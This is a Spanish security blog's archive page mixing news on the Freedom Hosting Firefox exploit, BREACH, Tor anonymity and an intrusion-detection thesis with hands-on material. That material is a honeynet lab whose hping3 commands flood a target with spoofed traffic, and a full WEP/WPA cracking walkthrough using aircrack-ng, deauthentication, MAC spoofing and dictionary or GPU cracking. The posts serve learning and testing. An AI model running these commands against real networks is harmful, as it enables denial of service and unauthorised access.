Archivos de la categoría ‘Ethical Hacking’

Miércoles 14 de Agosto de 2013 en el Swissotel de San Isidro- Av. Via Central 150 en el horario de 8:00 a.m. a 6:00 p.m, 2do Congreso Congreso Cyber Security Bank Perú 2013

Firefox 17 0day en Freedom Hosting

Esta noticia ha sido un impacto en muchos sitios, así que no podíamos dejar de informar a los lectores de DragonJAR de lo que ha pasado.

Eric Eoin Marques es dueño de un ISP llamado Freedom Hosting. Según el FBI este ISP es el mayor distribuidor de pornografía infantil. Es por eso que el FBI ha presentado a Irlanda una solicitud de extradición para Eric.

Según lo leído por ahí Freedom Hosting es uno de los proveedores de hosting que más sitios .onion tiene dentro de la red de .

A parecer el FBI ha podido localizar a Eric aún usando la red Tor… Muchos de nosotros que somos usuarios de esta red nos preguntaremos

¿Pero como es posible? ¿Esta red no arrojaba privacidad?, ¿Anonimato?

Antes de sacar conclusiones vamos a ver que ha pasado realmente….

Primero, para quien no lo sepa, vamos a explicar por encima que es un hidden service de tor, esos .onion que encontramos por ahí.

Hidden Services

Los servicios que ocultan la localización (por ejemplo, la dirección IP) de quien provee el servicio (Ej. un servicio web accesible sólo desde la red Tor) se les suele llamar servicios de localización oculta (en inglés location-hidden services) o simplemente servicios ocultos (en inglés hidden services). -Wikipedia

A priori sería imposible poder localizar a Eric.

Pero, parece ser que el FBI colocó un exploit con el que pudo localizar y obtener la IP aún usando TOR.

El código javascript para explotar el fallo que usaron se encuentra en el siguiente link => http://pastebin.mozilla.org/2776374

El software que era vulnerable es la versión Firefox 17 ESR (que es el que se basa el Tor Browser oficial)

Una vez que el exploit era ejecutado con éxito, se cargaba un payload, el enlace con el análisis está aquí => http://pastebin.mozilla.org/2777139

http://tsyrklevich.net/tbb_payload.txt

Enlaces de interés:

[+] https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting

[+] http://www.twitlonger.com/show/n_1rlo0uu

[+] http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/

[+] http://www.ehackingnews.com/2013/08/almost-half-of-tor-sites-compromised-by.html

BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) es una nueva herramienta que utiliza una técnica mediante la cual es posible extraer tokens de logins, IDs de sesión y otra información sensible a partir de tráfico web cifrado SSL/TLS y en ¡sólo 30 segundos!.

Esto significa que podría permitir a un atacante descifrar fácilmente un canal HTTPS de un banco o de un sitio de venta online.
Fue presentada en la última conferencia Black Hat y se aprovecha varias vulnerabilidades de forma similar a lo que hacía CRIME con deflate; es decir, ataca al algoritmo de compresión aunque en las respuestas HTTP. Eso sí, como comentamos la información sensible ha de estar en las respuestas HTTP, el servidor por supuesto ha de utilizar compresión HTTP y el exploit requiere que la víctima visite primero un enlace malicioso.
 Imagen

Os contábamos hace un par de semanas que Google estaría barajando la posibilidad de cifrar por completo todos los datos que sus usuarios almacenan en su servicio en su nube, Google Drive, con el objeto de recuperar un poco la confianza perdida tras el escándalo de PRISM y todo lo que ha coleado el asunto. Lo haga o no, ya existen servicios en la actualidad que se encargan de ello. Boxcryptor es uno bastante interesante.

Google Drive, SkyDrive, Dropbox y otras tantas nubes de usuario tienen un grave problema: no crifran los datos en lado del cliente, por lo que esos datos pueden ser accedidos por los técnicos de la compañía. Hay alternativas 100% seguras, como SpiderOak o Wuala, pero si ya tienes cuenta en alguno de los anteriores servicios o en varios de ellos a la vez, puedes sacarle provecho al a herramienta que te presentamos hoy. Aunque tiene sus limitaciones.

Tal y como indican en la página web de Boxcryptor, “Boxcryptor protege tus archivos en la nube que uses Dropbox, Google Drive, Microsoft SkyDrive, SugarSync, Box.net, o cualquier otro principal proveedor de almacenamiento en la nube. También es compatible con todas las nubes que utilizan el estándar WebDAV como Cubby, Strato HiDrive y ownCloud”. No solo eso, sino que permite gestionar cuantas cuentas quieras, siempre que pagues. He ahí, tal vez, su mayor hándicap, aunque es comprensible que su modelo de negocio sea por suscripción.

El cifrado que utiliza Boxcryptor es AES-256 y RSA, dispone de compartición de archivos de forma segura, aplicaciones para PC y dispositivos móviles, entre otras características. De manera gratuita Boxcryptor solo se puede utilizar con fines no comerciales, y solo es posible utilizar un único servicio a la vez.

Diccionarios para ataques de Fuerza Bruta

recopilación de diccionarios para ataques de FUERZA BRUTA. Hay numerosas webs que ofrecen diccionarios creados, e incluso la posibilidad de generarlos. Por ello os dejamos una lista con las 15 webs más interesantes en un formato muy claro de tabla y una pequeña descripción de cada una de ellas. Si conocéis alguna más podemos ir añadiendo contenidos, no dudéis en utilizar los comentarios.

Nintendo: Hackeada después de 15.5 millones de intentos

Nintendo es la última victima de una serie de ataques que se están llevando a cabo, en este caso, el ataque duró aproximadamente un mes antes de brindarle a los atacantes algún fruto, 15.46 millones de peticiones fueron necesarias para romper la seguridad establecida por Nintendo en sus redes.

El imparable crecimiento de internet en el mundo, y la integración de los diversos sistemas informáticos conectados a la red de Internet han hecho que la Seguridad de la Información alcance un papel de suma importancia actualmente. Desde el momento en que un equipo (bien un ordenador, una tableta o un “smartphone”) se conecta a Internet, se abren toda una serie de posibilidades; sin embargo, éstas traen consigo nuevos y en ocasiones complejos tipos de ataques. Para que  las informaciones sean protegidas de acciones maliciosas, es necesario hacer uso de herramientas especializadas en la protección de datos e informaciones, como antivirus, antispam, firewall, IDS, IPS, balanceadores de cargas, control de accesos, sistemas criptográficos tipos VPN y entre otras. Un sistema que auxilia y automatiza la protección de las informaciones es el sistema de detección de intrusos (IDS) que  tiene como intensión de detectar el uso no autorizado, ataques en ordenadores o en redes de ordenadores. Sin embargo, algunas funcionalidades de esos sistemas son limitadas, tales como la detección, el análisis y la respuesta instantánea de un nuevo ataque (Zero day attack).
La aplicación de técnicas basadas en Inteligencia Artificial para la detección de intrusos (IDS) fundamentalmente las redes neuronales artificiales (ANN), están demostrando ser un enfoque muy adecuado para paliar muchos de los problemas que se dan en esta área. Sin embargo, gran volumen de información que se requiere cada día para entrenar estos sistemas, junto con la necesidad exponencial de tiempo que requieren para asimilarlos, dificulta enormemente su puesta en marcha en escenarios reales.
Ante esta situación me propuse diseñar un sistema capaz de detectar situaciones anómalas en la red, basado en modelos de inteligencia computacional e instrumento complementario para visualizar la estructura interior de un conjunto de datos asociados al tráfico de redes, se aplicarán diversas técnicas EPP (Exploratory Proyection Pursuit) como PCA (Principal Component Analysis), MLHL (Maximum Likelihood Hebbian Learning) y CMLH (Cooperative Maximum Likelihood Hebian Learning), para analizar la estructura interna del conjunto de datos y de este modo identificar comportamiento anómalos asociados a situaciones de riesgo en la red (CORCHADO, HERRERO, 2013).
 
       Una vez definida la propuesta: “modelos de inteligencia computacional aplicados al diseño e investigación de sistema de detección de intrusos”; procedí a la realización de la fase de experimentación y de análisis de los resultados, por tal motivo me centré en la fase de análisis, debido a que la mencionada experimentación está igualmente orientada hacia dicha cuestión. Para las mencionadas pruebas, el autor en lo posible ha tratado de considerar un escenario real donde nuestro análisis no sólo se centrará en conocidos puertos, protocolos, direcciones IPV4, etc. sino que analizaremos todo el tráfico de datos generados por la red (los datos capturados fueron de 6 semanas llegando acumular un aproximado de 600 gb de tráfico de red), en donde se han hecho un sin número de pruebas de ataques tanto internos como externos suplantando inclusive algunas IP de los equipos de la red (señuelos), pero el mayor énfasis de estas pruebas cayó en los ataques internos (localmente) en vista que con las pruebas realizadas hemos podido ver que muchos de estos ataques son más difíciles de detectar y se confunden dentro del tráfico normal de la red lo cual muchas veces pasan desapercibidas por el administrador de redes. En la séptima edición del informe anual de seguridad en entidades financieras realizado por Deloitte[84], en la que han participado más de 350 entidades financieras de todo el mundo, 19 de ellas españolas y que analiza el estado de estas compañías en materia de seguridad de la información; concluyen que los “ataques internos” y “las “fugas de información” son, por tanto los problemas más detectados en las entidades. Las proyecciones de PCA, MLHL y en especial la de CMLHL permiten identificar situaciones anómalas, muchas de estas situaciones dependiendo de dónde proceda el ataque tendrán una particularidad que se diferenciará al del tráfico normal pudiendo ser la concentración de paquetes, direcciones no paralelas, el distanciamiento que tienen con el conjunto de paquetes y muchas más particularidades que se reflejaron en la experimentación y análisis nos dan indicios de situaciones anómalas, lo cual nos permite su identificación.
          En la Figura 1.1 se puede apreciar el scatter plot generado por la PCA, enfrentando las m (número de neuronas de salida) primeras componentes (columnas) del conjunto de datos entre sí. Dicha visualización representa el tráfico normal de la red por un tiempo de 10 minutos.
Figura 1.1 Scatter Plot, del tráfico normal.
 

            En la Figura 1.2  apreciamos el tráfico normal de la red en 3 dimensiones.

Figura 1.2 Tráfico normal de la red en 3D.
 
      En la Figura 1.3 apreciamos la proyección PCA en 2 dimensiones, del segmento simple(S1) conteniendo situaciones no anómalas (tráfico normal de la red)
Figura 1.3 Visualización del Segmento  simple-S1.(PCA)
 
 
 
 
A continuación visualizaremos el segmento simple (S9), en total tienen una duración de 10 minutos aproximadamente, donde el tipo de ataque fue una denegación de servicio que consistió en la inundación de paquetes UDP flags por un tiempo de sólo 8 segundos. Apreciaremos la proyección 2D del  PCA, MLHL y CMLHL respectivamente. El tamaño de los paquetes, que son diferenciados con el color magenta (S9) del tráfico normal; vemos que toman un direccionamiento  continuo contrario al del tráfico normal y es debido a que dicho ataque es del tipo spoofing en la cual la identidad del atacante es suplantada por un sin número de direcciones IPs (direcciones no locales).
Figura 1.4  Visualización del Segmento simple-S9. (PCA)
 Figura 1.5  Visualización del Segmento simple-S9. (MLHL)
 
 
Figura 1.6  Visualización del Segmento simple-S9. (CMLHL)
         De todos los experimentos presentados anteriormente, se ha podido ver que los ataques realizados localmente muchas veces se confunden con el del tráfico normal, pero la dirección,  la dimensión y la localización de los paquetes las distinguen de lo normal. Así mismo aquellos ataques realizados desde el exterior de nuestra red son representados como líneas no paralelas a la dirección en la cual el tráfico normal se desarrolla. Por lo tanto no es fácil el establecer exactamente que ocurre en un momento dado; es en este preciso instante donde el análisis cumple un papel sumamente importante por tal motivo nos apoyamos en uno de los paradigmas del presente estudio, que es el estudio de casos (CBR), donde el análisis incorpora dos comportamientos diferentes que son: “aprendiendo” y la “explotación”.
      Los resultados del estudio de pruebas demuestran la capacidad de  generalización, porque muestra “el modelo visual” de ataques nuevos incluso si el modelo neuronal no ha afrontado tales ataques antes. Debería ser notado que los atacantes emplean estrategias muy diferentes para poder pasar inadvertidos en la red haciendo uso de diversas técnicas como: la extensión de los paquetes de ataque con el tiempo o reduciendo la cantidad de paquetes en un ataque, el empleo de señuelos, etc; harán que  se visualicen menos claramente dichos ataques, pero con el empleo del CMLHL se pueden identificar dichos ataques con mayor efectividad como ha sido mostrado en las figuras anteriormente mostradas.
         Comparando CMLHL con otros  modelos no supervisados, podemos concluir que PCA y MLHL en la identificación de situaciones anómalas son menos eficientes y eficaces. Por tal motivo CMLHL será el modelo a ser utilizado para próximos proyectos de investigación relacionados al campo de ID. Próximamente en: http://peromatech.com, https://peromatech.wordpress.com
referencias:
[1] CORCHADO, Emilio; HERRERO, Álvaro. RT-MOVICAB-IDS: Addressing real-time intrusion detection. Spain, 2013. University of Salamanca.
[2] Proyecto de tesis :Modelos de inteligencia computacional aplicados al diseño e investigación de detección de intrusos, Autor: Arthur Huamani Cuba, Bilbao -España
Entonces al fin y al cabo, la red Tor provee una manera de esconder el vínculo entre la dirección origen y destino de una conexión dada. Por lo tanto, un intruso no puede determinar de dónde viene la información y hacia dónde va, lo que nos convierte en anónimos.    Pero la pregunta persiste: ¿puede realmente volvernos anónimos? La respuesta es sí y no. Necesitamos recordar que todos los paquetes que son enviados de nuestro cliente al servidor serán encriptados en el servidor. Esto realmente tiene sentido por cómo el servidor usaría la información y haría algo con ella si ésta fuera encriptada. En consecuencia, Tor provee anonimato sobre internet, pero no puede proveer los medios para mantenerte anónimo al servidor que está recibiendo la información.      Describamos esto un poco más. Si estamos enviando paquetes que contienen nuestro nombre de usuario, nombre de dominio o alguna otra información que indica nuestra presencia, entonces la máquina objetivo sabrá quiénes somos, aunque algún intruso que esté escuchando en un nodo intermediario tal vez no. Esto se reduce a lo siguiente:

En cada conexión a través de la red Tor, necesitamos tener en cuenta que a la información:

– el cliente la envía
– Internet la direcciona
– el servidor la recibe

Con Tor, podemos asegurarnos que Internet aunque canaliza la información, no tiene idea sobre la dirección origen ni destino que usamos, lo cual es crucial para mantener el anonimato sobre Internet. Pero la información enviada de un cliente hacia un servidor son visibles en los dos extremos de la conexión. Por lo tanto, para ser verdaderamente anónimos, incluso en la máquina destino, necesitamos no encapsular ninguna información sensible en el paquete de datos del tráfico entre el cliente y el servidor.

Con motivo de esconder la información del nivel de aplicación que pueda comprometer nuestro anonimato, podemos usar Torbutton, una extensión de Firefox que inhabilita muchos posibles filtrados de información que nos puedan comprometer. O lo que es mejor, podemos usar Tor browser bundle, el cual usa Vidalia para configurar e iniciar Tor. Éste además abre el navegador Web Tor con Torbutton integrado, el que podemos usar para buscar anónimamente en internet.

fuente:  http://elbauldelprogramador.com/articulos/logrando-el-anonimato-con-tor-parte-1/
referencia : [1] https://help.ubuntu.com/community/Tor. (guía de instalación)
                  [2] https://www.torproject.org/docs/tor-manual.html.en.(manual)

        The entire purpose of deploying a honeynet is to collect data. However, that data has no value if it cannot be analyzed. Walleye interface is the graphical tool available for analyzing the logged activities and alerts. Walleye also supports the integration and analysis of sebek data. The power of sebek data is that it captures all of the system activity and gives the ability to analyze what happened on the honeypot, even if the attacker went in encrypted.[1]
         On opening the management interface in the browser (https://ip-address-management-interface), administrator will be prompted to login. This is a SSL connection. The default user is roo and password is honey. Administrator will then be prompted to change the password. [2]
          This section discusses the data captured and analyzed through the walleye interface. Walleye interface facilitates the analysis of data on the basis of source IP, destination IP, source port, destination port. The protocols used for analysis are TCP, UDP, and ICMP. However sebek data is also captured and analyzed.
Attack Profile
          In order to test the functionality of honeynet, some simulated attacks are launched. Although this simulation does not actually hack the target machine, but it provides deep insight about the working of honeynet and how walleye displays the data from MySQL database.
          As a beginner, the simplest attacks that can be launched are packet fabrication without SYN flag, DOS, smurf attack, flooding by using IP spoofing etc. The tool used to do so is hping3. [3]
          The command used to launch the attack is hping3. One of the customized ways to do this is to use the option flood with the command to launch flooding on a target IP. Administrative rights are required to run the mentioned command from the attacker’s machine. The attacker’s machine is placed in the production network. [4]
#hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source <Victim IP>
           Source IP can also be spoofed with –a option in this command. The logged entries against spoofed attacker IP do not depict the actual IP of the attacker. [5]
           There are some numeric options that represent UDP/ICMP protocol in the command i.e. flooding is done through which protocol. These options are -1 for ICMP, -2 for UDP protocol. For TCP protocol, different flags can be used as mentioned (S for SYN, R for RST, A for ACK etc.) in the sample command above.
V= verbose ; c= packet-count ; d= data-size ; S= SYN flag ;w= winsize ;p= port; s= base source port
Result
          Flooding attack is launched in different scenarios with different protocols. There are three scenarios created to launch the attack and analyze the consequences on walleye interface. the three scenarios are based on TCP, UDP, and ICMP protocols respectively.
Scenario 1 – Use of TCP SYN flag to flood the target machine (honeypot) The command used for this scenario to launch flood attack on victim machine is:
hping3 -V -c 10000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source VICTIM_IP [23]
Figure 1. Flooding the honeypot with TCP traffic
Scenario 2 – Use of UDP protocol to flood the target machine
The command used for this scenario to launch flood attack on victim machine is:
hping3 -V -c 10000 -d 120 -2 -w 64 -p 445 -s 445 –flood –rand-source VICTIM_IP
Figure 2. Flooding the honeypot with UDP traffic
Scenario 3 – Use of ICMP protocol to flood the victim machine with IP spoofing
This scenario uses ICMP protocol to ping the victim machine repeatedly. It is observed that millions of IDS are logged against a single connection within a few minutes of launching the attack as shown in figure 4. The number of packets and bytes transferred from the attacker’s machine are quite large but the incoming packets and bytes in response are 0 because the command is run with two special things:
  • IP spoofing used by the attacker to launch the attack (option –a in command).
  • Use of broadcast address of the victim machine.
The command used to launch attack using ICMP protocol is:
hping3 -1 –flood -a VICTIM_IP BROADCAST_ADDRESS

Figure 2. Flooding the honeypot with ICMP traffic

References
[1]”International Journal of computer Applications (0975-887)”,Gurdip Kaur and Jatinder Singh saini
[2]“Know Your Enemy: Honeywall CDROM Roo”, 3rd Generation Technology, The Honeynet Project.
[3]“Hping”, http://www.hping.org
[4]Johny, Awad, Andreas, Derdemezis, 2005. “Implementation of a High Interaction Honeynet Testbed for Educational and Research Purposes”, MsITT Thesis, AIT.
[5]Zereneh, William, 2010. “Packet Crafting”.

 

Wauuu lo que puede hacer un simple Script , volver loca a una mujer! .Una vez más demostrado que un informático también tiene su corazoncillo y que es un buen conquistador!!! :p.
 
Bueno volviendo al mundo malévolo y dejando la cursileria de lado , les presentaré un resumen de como atacar una Wireless con seguridad WEP y WPA/WPA2/PSK.
 
” A continuación se ponen en conocimiento de los artículos del Código Penal del Reino de España que existe la posibilidad de que sean vulnerados si se diese un uso usofraudulento de las comunicaciones inalámbricas. El autor no se hace responsable del uso de los conocimientos adquiridos o aquí descritos. “
 
Conociendo las normas legales continuaremos…
 
Para esto a manera de concepto existen diversos tipos de ataques sobre una Wi-Fi :
 
*Eavesdropping
*Defraudación de comunicaciones
*Hijacking
*Man in the Middle.
*Denial of Service & Distributed  D.O.S
*Spam/ Span over Voice over IP (SPIT)
*Ejecución remota de código arbitrario.
 
Empezando con algunos comandos en Linux :
Viendo dispositivo inalámbrico y activandolo.
      ifconfig
      ifconfigwlan0 up
Listando redes inalámbricasdisponibles.
      iwlist wlan0 scan
Conectandose a una red Wirless
      iwconfig wlan0 essidWifiDestroyer
OpteniendodireccionIP.
      dhclient3 wlan0
 
Instalación en Linux de herramientas Wireless:
Normalmente viene  instalado pero si no hay que instalarlo manualmente.
Paquete “wireless-tool”.
  sudo apt-get install wireless-tools
Comprobar chipset
  lspci | grep Network
  lsusb | grep Wireless
•  Instalación de Suite Aircrack-ng
  sudo apt-get install aircrack-ng  
Airmon-ng: cambio de modo de NIC.
EJEMPLOS BÁSICOS:
•To start wlan0 in monitor mode:
  airmon-ng start wlan0
•To start wlan0 in monitor mode on channel 8:
  airmon-ng start wlan0 8
•To stop wlan0:
  airmon-ng stop wlan0
•To check the status:
  airmon-ng
 
Cambio de la MAC pasos:
#airmon-ng                          //viendo la interfaz que usamos
#airmon-ng stop  wlan0        //detenemos el modo monitor
#ifconfig  wlan0   down         //tiramos nuestra interface
#macchanger –mac 02:11:22:33:4B:5A wlan0     //cambiando la mac a 02:11:22:33:4B:5A
#airmon-ng start wlan0         //iniciamos el modo monitor nuevamente.
 
Nota:existen un sin numero de herramientas que practicamente automatizan el cambio de la 
MAC :
MAC AddressChanger: (Windows)
TechnitiumMAC AddressChanger: (Windows) 
   http://www.technitium.com/tmac/index.html
A)Buscando Redes empezando ATAQUE WEP:
#airodump-ng wlan0            //escaneando redes, para detener : Ctrl + C 
#airodump-ng -c 1 -w underc0de –bssid 4A:2C:56:33:76:5E wlan0  //canal : 3, capturamos 
 datas [no cerrar terminal]
 
Asociándonos a la Red (abrimos otro terminal)
#aireplay-ng -1 0 -a  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A -e WifiDestroyer wlan0  
Si nos aparece algun tipo de error puede ser por lo siguiente:
-La red a la que quieres atacar está muy lejos.
-Tu tarjeta de red no puede hacer inyección de paquetes.
-el router tiene seguridad para evitar este tipo de ataques.
 
Inyectando tráfico (en el terminal anterior)
#aireplay-ng -3 -b  4A:2C:56:33:76:5E -h 02:11:22:33:4B:5A wlan0  
 
Desencriptando el password (abrimos un tercer terminal )
#aircrack-ng underc0de-01.cap  
Con esto al termino del desencriptado nos mostrara el password.
 
B) ATAQUE WPA/WPA2/PSK:
Colocamos  nuestra interfaz en modo monitor de la misma forma que en el caso del Ataque 
WEP.
Capturando el HANDSHAKE
#airodump-ng mon0  //escaneando redes, para detener : Ctrl + C 
#airodump-ng mon0 –channel 1 –bssid 4A:2C:56:33:76:5E -w /tmp/wpa2  //nos aparece una 
imagen de la red de clientes conectados
Abrimos otro terminal y en el colocamos lo siguiente:
#aireplay-ng -0 1 -a 4A:2C:56:33:76:5E -c 70:F1:A2:95:T4:5D mon0    // 70:F1:A2:95:T4:5D : 
MAC del cliente
Ejecutado el comando, en el terminal anterior aparecerá en la parte superior derecho el 
Handshake.
Por ultimo desencriptaremos el password pudiendo hacerse de dos formas con :
*Fuerza Bruta con el John the Ripper.
*Por medio de Diccionario.
Obteniendo el Password
Utilizando el diccionario 
#aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 4A:2C:56:33:76:5E /tmp/wpa2*.cap
 
Utilizando el john the ripper
# /pentest/passwords/jtr/john –stdout –incremental:all | aircrack-ng -b 4A:2C:56:33:76:5E -w – 
/tmp/wpa2*.cap
Ahora sólo nos queda esperar en vista que el tiempo es proporcional a la dificultad del 
password.
 
Existe una herramienta que también es muy recomendable por su automatización y por el 
tiempo que nos ahorrará ,siendo muy usada en las auditorias.
WIFITE es una herramienta que esta desarrollada en Python y que nos permitirá realizar 
ataque WEP y WAP al mismo tiempo, para esto lo descargamos :
#chmod +x wifite.py
ejecutamos la aplicación
#./wifite.py
Lo que viene a continuación es sólo seguir la instrucción del programa que prácticamente 
trabajará al punto que nos brindara directamente el password de la red atacada.
 
David Hulton, permite alquilar en su web alquilar por pocos dólares, clustersde tarjetas 
FPGAS para crackearWPA.   https://www.cloudcracker.com/
 
Si se dispone de tarjetas gráficas compatibles, se pueden utilizar herramientas que son 
capaces de procesar el ataque en los núcleos de las propias GPUs. Por ejemplo, con 
ElcomsoftWireless Security Auditor (Windows).   http://www.elcomsoft.es
 
En Linux, se puede usar Pyrit. Este programa permite crear Bases de datos masivas de 
hashes precalculados de passwords. Para ello hace uso de los multiples cores de una 
maquina y de algunas tarjetas graficas como ATI-Stream, Nvidia CUDA and OpenCL. 
Es el ataque más potente que se puede hacer actualmente para ataques de fuerza 
bruta.
 
Comandos: pyrit -r captura_WPA_Wifilabs.pcap-01.cap -i dict.txt -b 1c:7e:e5:fd:08:f8 
attack_passthrough
  -r à fichero de captura de Handshake
  -i à Dicccionario
  – b à BSSID de la red
  attack_passthrough